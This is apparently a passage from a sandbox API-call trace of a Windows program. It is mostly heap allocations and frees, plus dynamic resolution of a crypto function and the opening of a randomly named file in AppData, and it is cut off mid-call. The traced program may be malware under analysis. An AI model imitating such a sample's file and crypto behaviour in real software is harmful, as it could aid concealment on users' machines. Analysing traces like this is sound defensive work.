RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0149.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0149.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0149.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0149.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0149.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7080 [0149.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0149.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0149.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0149.949] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0149.949] CryptDestroyHash (hHash=0x9e20f8) returned 1 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0149.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0149.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0149.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0149.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0149.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0149.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0149.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0149.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0149.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0149.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/rCxPhCicoc5u7sEbYlz.ots" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rcxphcicoc5u7sebylz.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.956] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.957] SetFilePointerEx 